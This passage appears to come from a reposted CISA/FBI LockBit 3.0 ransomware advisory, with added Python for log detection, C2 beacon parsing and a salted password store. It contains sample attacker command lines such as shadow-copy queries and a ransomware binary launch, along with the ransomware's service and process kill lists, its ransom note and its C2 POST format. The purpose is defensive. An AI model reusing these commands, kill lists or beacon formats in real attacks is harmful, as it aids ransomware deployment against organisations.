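2023-03-01T10:14:20Z|WS-042|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -Command "Get-WmiObject -Query 'select * from Win32_ShadowCopy'"
2023-03-01T10:15:30Z|DC01|CORP\\admin|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-ADComputer -filter * -Searchbase 'DC=corp,DC=example' | Foreach-Object { Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}
2023-03-01T10:16:00Z|WS-042|NT AUTHORITY\\SYSTEM|C:\\Windows\\Temp\\lb3.exe|C:\\Windows\\Temp\\lb3.exe -pass 0123456789abcdef0123456789abcdef -gspd
2023-03-01T10:16:05Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\dllhost.exe|C:\\Windows\\System32\\dllhost.exe /Processid:{11111111-2222-3333-4444-555555555555}
2023-03-01T10:16:07Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\jdoe\\notes.txt
"""


def parse_line(line):
    """Split one log line into its five fields; the command line keeps any '|'."""
    ts, host, user, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmd": cmd}


def detect(log_text):
    """Return [(rule name, host, command line)] for every line matching a rule."""
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        for name, rx, _why in RULES:
            if re.search(rx, rec["cmd"], re.IGNORECASE):
                hits.append((name, rec["host"], rec["cmd"]))
    return hits


def hosts_by_rule(hits):
    """Group matched hosts per rule, the view an analyst pivots on."""
    out = {}
    for name, host, _ in hits:
        out.setdefault(name, set()).add(host)
    return out


if __name__ == "__main__":
    for name, host, cmd in detect(SAMPLE_LOG):
        print(f"[{name}] {host}: {cmd}")
```

The shadow copy rule only sees the query when it appears on a command line; the advisory says LockBit calls WMI directly, so pair it with WMI activity telemetry rather than relying on process creation alone. The bcdedit rule fires on both the safeboot set and the deletevalue restore, which is intended: the restore is as good a signal of the sequence as the set.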


SERVICES KILLED

vss sql svc$ memtas mepocs msexchange sophos veeam backup GxVss GxBlr GxFWD
GxCVD GxCIMgr


PROCESSES KILLED

sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice
ocautoupds encsvc firefox tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice
excel infopath msaccess mspu onenote outlook powerpnt steam thebat thunderbird
visio winword wordpad notepad


LOCKBIT 3.0 RANSOM NOTE

~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~

>>>>> Your data is stolen and encrypted.

If you don't pay the ransom, the data will be published on our TOR darknet
sites. Keep in mind that once your data appears on our leak site, it could be
bought by your competitors at any second, so don't hesitate for a long time. The
sooner you pay the ransom, the sooner your company will be safe.


NETWORK CONNECTIONS

If configured, LockBit 3.0 will send two HTTP POST requests to one of the C2
servers. Information about the victim host and bot is encrypted with an
Advanced Encryption Standard (AES) key and encoded in Base64.

Example of HTTP POST request

POST <Lockbit C2>/?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
User-Agent: Safari/537.36 <Lockbit User Agent String>
Host: <Lockbit C2>
Connection: Keep-Alive

LIWy=RJ51lB5GM&a4OuN=<Lockbit ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI&6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR&m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl

Example of information found in encrypted data

{
  "bot_version":"X",
  "bot_id":"X",
  "bot_company":"X",
  "host_hostname":"X",
  "host_user":"X",
  "host_os":"X",
  "host_domain":"X",
  "host_arch":"X",
  "host_lang":"X",
  "disks_info":[
    {
      "disk_name":"X",
      "disk_size":"XXXX",
      "free_size":"XXXXX"
    }


USER AGENT STRINGS

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko)
Chrome/91.0.4472.77 Safari/537.36 Edge/91.0.864.37 Firefox/89.0 Gecko/20100101
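Added example, not part of the advisory and not CISA/FBI tooling: a Python parser and scorer for an HTTP request of the shape shown under Network Connections, plus a lookup of the Host header against the Table 1 exfiltration sites. The request embedded below is modelled on the advisory's example; the Host name, bot ID, Base64 payload, the benign comparison request and the scoring thresholds are constructed for this example, and the "bare Safari/537.36 prefix" heuristic is an assumption drawn from the advisory's User-Agent line rather than something the advisory states.

```python
"""Parser and scorer for a LockBit 3.0-style C2 HTTP POST, plus a lookup of the
advisory's Table 1 exfiltration sites. Added example; not CISA/FBI tooling."""
import base64
import re

# Table 1 hosts, refanged from the advisory's defanged form.
KNOWN_EXFIL_HOSTS = {
    "www.premiumize.com", "anonfiles.com", "www.sendspace.com",
    "fex.net", "transfer.sh", "send.exploit.in",
}

# Constructed request modelled on the advisory's example. Host, bot ID and the
# Base64 payload are placeholders made up for this example.
SAMPLE_PAYLOAD = base64.b64encode(b"constructed-ciphertext-placeholder-0123456789abcdef").decode()
SAMPLE_REQUEST = (
    "POST /?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Content-Type: text/plain\r\n"
    "User-Agent: Safari/537.36 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko)\r\n"
    "Host: c2.example.invalid\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "LIWy=RJ51lB5GM&a4OuN=0123456789abcdef&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW"
    "&2D6=Bokz&wQadZP=" + SAMPLE_PAYLOAD + "&Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c"
)

# Constructed benign comparison: an ordinary browser page fetch.
BENIGN_REQUEST = (
    "GET /catalog?page=2&sort=name HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)


def split_pairs(qs):
    """Split a query string into (key, value) pairs without URL-decoding, so a
    Base64 value keeps its '+' and '/' characters intact."""
    pairs = []
    for part in qs.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_request(raw):
    """Parse a raw HTTP/1.1 request into method, path, query pairs, headers, body pairs."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query_pairs": split_pairs(query),
            "headers": headers, "body_pairs": split_pairs(body.strip())}


def looks_random(key):
    """The beacon's keys are short mixed-case/alphanumeric strings rather than
    words; treat digits or mixed case as 'random'."""
    return bool(re.search(r"\d", key)) or bool(re.search(r"[A-Z]", key) and re.search(r"[a-z]", key))


def find_base64_values(pairs, min_chars=32):
    """Return (key, decoded length) for values that are well-formed Base64 of at least min_chars."""
    found = []
    for key, value in pairs:
        if len(value) >= min_chars and len(value) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
            try:
                found.append((key, len(base64.b64decode(value, validate=True))))
            except ValueError:
                pass
    return found


def indicators(req):
    """Names of the beacon traits present in a parsed request."""
    out = []
    ua = req["headers"].get("user-agent", "")
    if req["method"] == "POST" and req["headers"].get("content-type", "").startswith("text/plain"):
        out.append("post_text_plain")
    if ua.startswith("Safari/537.36"):  # assumption: bare product token first, as on the advisory's line
        out.append("ua_bare_safari_prefix")
    keys = [k for k, _ in req["query_pairs"] + req["body_pairs"]]
    if len(keys) >= 3 and sum(looks_random(k) for k in keys) / len(keys) >= 0.8:
        out.append("random_query_keys")
    if find_base64_values(req["body_pairs"]):
        out.append("base64_blob_in_body")
    return out


def is_known_exfil_host(host):
    """True when a Host header names one of the Table 1 file sharing sites."""
    return host.split(":")[0].lower() in KNOWN_EXFIL_HOSTS
```

The Base64 blob can be located and sized but not read, since the advisory states it is AES-encrypted; what the parser gives a defender is the traffic shape (POST, text/plain, random keys, one long Base64 value) to match against proxy logs, and the Table 1 lookup catches the exfiltration stage that precedes encryption.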

MITRE ATT&CK TECHNIQUES

See Table 3 for all referenced threat actor tactics and techniques in this
advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s
Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.



Table 3: MITRE ATT&CK tactics and techniques referenced in this advisory

Initial Access

Technique Title | ID | Use
Valid Accounts | T1078 | LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
Exploit External Remote Services | T1133 | LockBit 3.0 actors exploit RDP to gain access to victim networks.
Drive-by Compromise | T1189 | LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing.
Exploit Public-Facing Application | T1190 | LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims' systems.
Phishing | T1566 | LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks.

Execution

Technique Title | ID | Use
Execution | TA0002 | LockBit 3.0 launches commands during its execution.
Software Deployment Tools | T1072 | LockBit 3.0 uses Chocolatey, a command-line package manager for Windows.

Persistence

Technique Title | ID | Use
Valid Accounts | T1078 | LockBit 3.0 uses a compromised user account to maintain persistence on the target network.
Boot or Logon Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for persistence.

Privilege Escalation

Technique Title | ID | Use
Privilege Escalation | TA0004 | LockBit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient.
Boot or Logon Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for privilege escalation.

Defense Evasion

Technique Title | ID | Use
Obfuscated Files or Information | T1027 | LockBit 3.0 will send encrypted host and bot information to its C2 servers.
Indicator Removal: File Deletion | T1070.004 | LockBit 3.0 will delete itself from the disk.
Execution Guardrails: Environmental Keying | T1480.001 | LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered.

Credential Access

Technique Title | ID | Use
OS Credential Dumping: LSASS Memory | T1003.001 | LockBit 3.0 uses Microsoft Sysinternals ProcDump to dump the contents of LSASS.exe.

Discovery

Technique Title | ID | Use
Network Service Discovery | T1046 | LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks.
System Information Discovery | T1082 | LockBit 3.0 will enumerate system information, including hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices.
System Location Discovery: System Language Discovery | T1614.001 | LockBit 3.0 will not infect machines with language settings that match a defined exclusion list.

Lateral Movement

Technique Title | ID | Use
Remote Services: Remote Desktop Protocol | T1021.001 | LockBit 3.0 uses Splashtop remote-desktop software to facilitate lateral movement.

Command and Control

Technique Title | ID | Use
Application Layer Protocol: File Transfer Protocols | T1071.002 | LockBit 3.0 uses FileZilla for C2.
Protocol Tunneling | T1572 | LockBit 3.0 uses Plink to automate SSH actions on Windows.

Exfiltration

Technique Title | ID | Use
Exfiltration | TA0010 | LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network.
Exfiltration Over Web Service | T1567 | LockBit 3.0 uses publicly available file sharing services to exfiltrate a target's data.
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | LockBit 3.0 actors use (1) rclone, an open source command-line cloud storage manager, to exfiltrate data and (2) MEGA, a publicly available file sharing service, for data exfiltration.

Impact

Technique Title | ID | Use
Data Destruction | T1485 | LockBit 3.0 deletes log files and empties the recycle bin.
Data Encrypted for Impact | T1486 | LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources.
Service Stop | T1489 | LockBit 3.0 terminates processes and services.
Inhibit System Recovery | T1490 | LockBit 3.0 deletes volume shadow copies residing on disk.
Defacement: Internal Defacement | T1491.001 | LockBit 3.0 changes the host system's wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively.

MITIGATIONS

The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations
below to improve your organization’s cybersecurity posture on the basis of
LockBit 3.0’s activity. These mitigations align with the Cross-Sector
Cybersecurity Performance Goals (CPGs) developed by CISA and the National
Institute of Standards and Technology (NIST). The CPGs provide a minimum set of
practices and protections that CISA and NIST recommend all organizations
implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and
guidance to protect against the most common and impactful TTPs. Visit CISA’s
Cross-Sector Cybersecurity Performance Goals for more information on the CPGs,
including additional recommended baseline protections.

 * Implement a recovery plan to maintain and retain multiple copies of sensitive
   or proprietary data and servers [CPG 7.3] in a physically separate,
   segmented, and secure location (e.g., hard drive, storage device, the cloud).
 * Require all accounts with password logins (e.g., service account, admin
   accounts, and domain admin accounts) to comply with National Institute for
   Standards and Technology (NIST) standards for developing and managing
   password policies [CPG 3.4].
   * Use longer passwords consisting of at least 8 characters and no more than
     64 characters in length [CPG 1.4]
   * Store passwords in hashed format using industry-recognized password
     managers
   * Add password user “salts” to shared login credentials
   * Avoid reusing passwords
   * Implement multiple failed login attempt account lockouts [CPG 1.1]
   * Disable password “hints”
   * Refrain from requiring password changes more frequently than once per
     year. Note: NIST guidance suggests favoring longer passwords instead of
     requiring regular and frequent password resets. Frequent password resets
     are more likely to result in users developing password “patterns” cyber
     criminals can easily decipher.
   * Require administrator credentials to install software
 * Require phishing-resistant multifactor authentication [CPG 1.3] for all
   services to the extent possible, particularly for webmail, virtual private
   networks, and accounts that access critical systems.
 * Keep all operating systems, software, and firmware up to date. Timely
   patching is one of the most efficient and cost-effective steps an
   organization can take to minimize its exposure to cybersecurity threats.
 * Segment networks [CPG 8.1] to prevent the spread of ransomware. Network
   segmentation can help prevent the spread of ransomware by controlling traffic
   flows between—and access to—various subnetworks and by restricting adversary
   lateral movement.
 * Identify, detect, and investigate abnormal activity and potential traversal
   of the indicated ransomware with a networking monitoring tool. To aid in
   detecting the ransomware, implement a tool that logs and reports all network
   traffic, including lateral movement activity on a network [CPG 5.1]. Endpoint
   detection and response (EDR) tools are particularly useful for detecting
   lateral connections as they have insight into common and uncommon network
   connections for each host.
 * Install, regularly update, and enable real time detection for antivirus
   software on all hosts.
 * Review domain controllers, servers, workstations, and active directories for
   new and/or unrecognized accounts.
 * Audit user accounts with administrative privileges and configure access
   controls according to the principle of least privilege [CPG 1.5].
 * Disable unused ports.
 * Consider adding an email banner to emails [CPG 8.3] received from outside
   your organization.
 * Disable hyperlinks in received emails.
 * Implement time-based access for accounts set at the admin level and higher.
   For example, the Just-in-Time (JIT) access method provisions privileged
   access when needed and can support enforcement of the principle of least
   privilege (as well as the Zero Trust model). This is a process where a
   network-wide policy is set in place to automatically disable admin accounts
   at the Active Directory level when the account is not in direct need.
   Individual users may submit their requests through an automated process that
   grants them access to a specified system for a set timeframe when they need
   to support the completion of a certain task.
 * Disable command-line and scripting activities and permissions. Privilege
   escalation and lateral movement often depend on software utilities running
   from the command line. If threat actors are not able to run these tools, they
   will have difficulty escalating privileges and/or moving laterally.
 * Maintain offline backups of data, and regularly maintain backup and
   restoration [CPG 7.3]. By instituting this practice, the organization ensures
   they will not be severely interrupted, and/or only have irretrievable data.
 * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or
   deleted), and covers the entire organization’s data infrastructure [CPG 3.3].
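
The following Python credential store is an added example, not code from the advisory, from CISA, or from any product. It implements the password sub-bullets above as a single, testable unit: passwords of 8 to 64 characters [CPG 1.4], storage as per-user salted PBKDF2-HMAC-SHA256 hashes rather than plaintext, a reuse check against the account's previous hashes, and account lockout after repeated failed logins [CPG 1.1]. The lockout threshold, history depth and iteration count are my own choices, and the class and method names are hypothetical.

```python
"""Credential store applying the advisory's password mitigations (added example)."""
from __future__ import annotations

import hashlib
import hmac
import os
from dataclasses import dataclass, field

MIN_LENGTH, MAX_LENGTH = 8, 64   # CPG 1.4: at least 8 and no more than 64 characters
LOCKOUT_THRESHOLD = 5            # CPG 1.1: lock after repeated failures (threshold is our choice)
HISTORY_DEPTH = 5                # previous (salt, digest) pairs kept for the reuse check (our choice)
DEFAULT_ITERATIONS = 600_000     # PBKDF2-HMAC-SHA256 work factor; tune to your hardware


class PolicyError(ValueError):
    """Raised when a password change violates the configured policy."""


@dataclass
class Account:
    salt: bytes
    digest: bytes
    failed_attempts: int = 0
    locked: bool = False
    history: list[tuple[bytes, bytes]] = field(default_factory=list)  # older (salt, digest) pairs


class CredentialStore:
    def __init__(self, iterations: int = DEFAULT_ITERATIONS) -> None:
        self._accounts: dict[str, Account] = {}
        self._iterations = iterations

    def _derive(self, password: str, salt: bytes) -> bytes:
        # Random per-user salt, so identical passwords never produce identical digests.
        return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, self._iterations)

    def check_policy(self, user: str, password: str) -> str | None:
        """Return the violated rule, or None if the password is acceptable for this user."""
        if not MIN_LENGTH <= len(password) <= MAX_LENGTH:
            return f"password length must be {MIN_LENGTH} to {MAX_LENGTH} characters"
        acct = self._accounts.get(user)
        if acct is not None:
            for salt, digest in [(acct.salt, acct.digest), *acct.history]:
                if hmac.compare_digest(self._derive(password, salt), digest):
                    return "password was used before on this account"
        return None

    def set_password(self, user: str, password: str) -> None:
        """Create the account or rotate its password; a rotation also clears any lockout."""
        violation = self.check_policy(user, password)
        if violation:
            raise PolicyError(violation)
        salt = os.urandom(16)
        digest = self._derive(password, salt)
        old = self._accounts.get(user)
        history = [] if old is None else [(old.salt, old.digest), *old.history][:HISTORY_DEPTH]
        self._accounts[user] = Account(salt, digest, history=history)

    def authenticate(self, user: str, password: str) -> bool:
        acct = self._accounts.get(user)
        if acct is None:
            self._derive(password, bytes(16))  # spend the same time for unknown users
            return False
        if acct.locked:
            return False
        if hmac.compare_digest(self._derive(password, acct.salt), acct.digest):
            acct.failed_attempts = 0
            return True
        acct.failed_attempts += 1
        if acct.failed_attempts >= LOCKOUT_THRESHOLD:
            acct.locked = True
        return False

    def is_locked(self, user: str) -> bool:
        acct = self._accounts.get(user)
        return acct is not None and acct.locked

    def unlock(self, user: str) -> None:
        """Help-desk unlock once the lockout has been reviewed."""
        acct = self._accounts[user]
        acct.locked, acct.failed_attempts = False, 0
```

Lockout is a per-account counter here; a directory service would also want it time-bounded and logged so that a burst of lockouts across many accounts is itself visible to the SOC as a password-spraying signal. Counting attempts before checking the lock, rather than after, keeps a locked account from leaking whether later guesses were right.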

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend
exercising, testing, and validating your organization's security program against
the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this
advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing
your existing security controls inventory to assess how they perform against the
ATT&CK techniques described in this advisory.
To get started:

 1. Select an ATT&CK technique described in this advisory (see Table 3).
 2. Align your security technologies against the technique.
 3. Test your technologies against the technique.
 4. Analyze your detection and prevention technologies performance.
 5. Repeat the process for all security technologies to obtain a set of
    comprehensive performance data.
 6. Tune your security program, including people, processes, and technologies,
    based on the data generated by this process.

The FBI, CISA, and the MS-ISAC recommend continually testing your security
program at scale and in a production environment to ensure optimal performance
against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

 * Stopransomware.gov is a whole-of-government approach that gives one central
   location for ransomware resources and alerts.
 * Resource to mitigate a ransomware attack: CISA-Multi-State Information
   Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
 * No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware
   Readiness Assessment.

REPORTING

The FBI is seeking any information that can be legally shared, including:

 * Boundary logs showing communication to and from foreign IP addresses
 * Sample ransom note
 * Communications with LockBit 3.0 actors
 * Bitcoin wallet information
 * Decryptor files
 * Benign sample of an encrypted file

The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not
guarantee victim files will be recovered. Furthermore, payment may also embolden
adversaries to target additional organizations, encourage other criminal actors
to engage in the distribution of ransomware, and/or fund illicit activities.
Regardless of whether you or your organization have decided to pay the ransom,
the FBI and CISA urge you to promptly report ransomware incidents to a local FBI
Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial
(SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or
866-787-4722).

DISCLAIMER

The information in this report is being provided “as is” for informational
purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial
product or service, including any subjects of analysis. Any reference to
specific commercial products, processes, or services by service mark, trademark,
manufacturer, or otherwise, does not constitute or imply endorsement,
recommendation, or favoring by the FBI, CISA, or the MS-ISAC.


This product is provided subject to this Notification and this Privacy &
Use policy.


TAGS

Co-Sealers and Partners: Federal Bureau of Investigation, Multi-State
Information Sharing and Analysis Center
MITRE ATT&CK TTP: Command and Control (TA0011), Credential Access (TA0006),
Defense Evasion (TA0005), Discovery (TA0007), Execution (TA0002), Exfiltration
(TA0010), Impact (TA0040), Initial Access (TA0001), Lateral Movement (TA0008),
Persistence (TA0003), Privilege Escalation (TA0004)
Topics: Cyber Threats and Advisories, Malware, Phishing, and Ransomware



